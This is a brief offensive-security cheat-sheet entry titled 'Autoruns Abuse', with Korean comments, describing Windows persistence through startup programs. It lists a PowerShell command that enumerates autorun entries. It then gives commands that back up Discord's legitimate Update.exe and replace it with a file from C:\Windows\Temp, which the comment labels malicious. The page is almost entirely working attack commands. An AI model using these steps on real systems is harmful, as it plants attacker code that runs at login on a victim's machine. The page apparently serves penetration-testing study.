Autoruns
Abuse
# 자동 실행 목록 열거
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
# 정상 파일을 악성 파일로 변경
mv C:\Users\Mick3y\AppData\Local\Discord\Update.exe C:\Users\Mick3y\AppData\Local\Discord\Update_back.exe
mv C:\Windows\Temp\Update.exe C:\Users\Mick3y\AppData\Local\Discord\Update.exeReferences
Last updated